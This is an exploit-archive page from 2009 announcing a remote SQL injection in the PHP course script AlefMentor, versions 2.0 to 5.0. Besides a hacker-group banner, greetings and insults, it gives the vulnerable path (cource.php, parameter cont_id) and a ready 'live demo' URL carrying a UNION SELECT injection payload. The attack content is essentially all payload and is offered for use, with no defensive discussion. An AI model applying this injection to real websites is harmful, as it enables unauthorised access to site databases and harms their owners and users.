[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : AlefMentor 2.0 <== 5.0 (id) Remote SQL Injection Vulnerability
# Published : 2009-12-08
# Author : Red-D3v1L
# Previous Title : Alqatari group Version 1.0 <== 5.0 (id) Remote SQL Injection Vulnerability
# Next Title : Chipmunk Newsletter Persistant XSS Vulnerability


_ _ _ _  _ _ _   _ _ _ _    _ _ _    __  _ _ _ _               _____1337~h4x0rZ__   _        ___    ___
    /_/Rd_ _ /   _ _\/   _ _ /   \      \<   |/_ _   /         /\   |     \    /\  ||   \( )   /\  |  \  (| |
    \_ _ _ _/  /_ _ /  /      __ |  ()  / |  |  /   / [d0t]com/@~\  | (O) /   /+~\ ||_O_|( )  /0O\ |   \  | |
     _ _ _ _\  \_ _ \  \ _ _ _   |     \  |  | /   /_ _      /|__|\ |     \  /|__|\|| O |( ) /+__+\| ^  \ | |
   /_ _ _ _ _\ _ _ _/\ _ _ _ /   |__|\__\ |__|/_ _ _ _ _\   /\|  |/\|__|\__\( )  ( )|___/(_)/\|  |/\__\__\|_ >
       
	   
==============================================================================
        [a] ~ Note : Hacker R0x Lamerz Sux !
==============================================================================
        [a]  AlefMentor 2.0  <== 5.0 (id) Remote SQL Injection Vulnerability
==============================================================================
    [a] my home:              [ http://sec-r1z.com ]
    [a] Script:                    [ AlefMentor 2.0 ]
    [a] Language:             [ PHP ]
    [a] Download             [ http://alefmentor.mac.findmysoft.com/ ]
    [a] Founder:               [ ./Red-D3v1L ]
    [a] Gr44tz to:             [ sec-r1z# Crew - Hackteach Team - my love :$ ]
    [a] Fuck to :               [ All LamErZ And n00bz ]
########################################################################

===[ Exploit SQL ]===  

 [a] [Path]/cource.php?action=pregled&cont_id=[SQL]

 [a] Live dem0 : 

http://www.site.com/am/cource.php?action=pregled&cont_id=21&courc_id=-2+union+select+version%28%29--


Author: Red-D3v1L <-

###########################################################################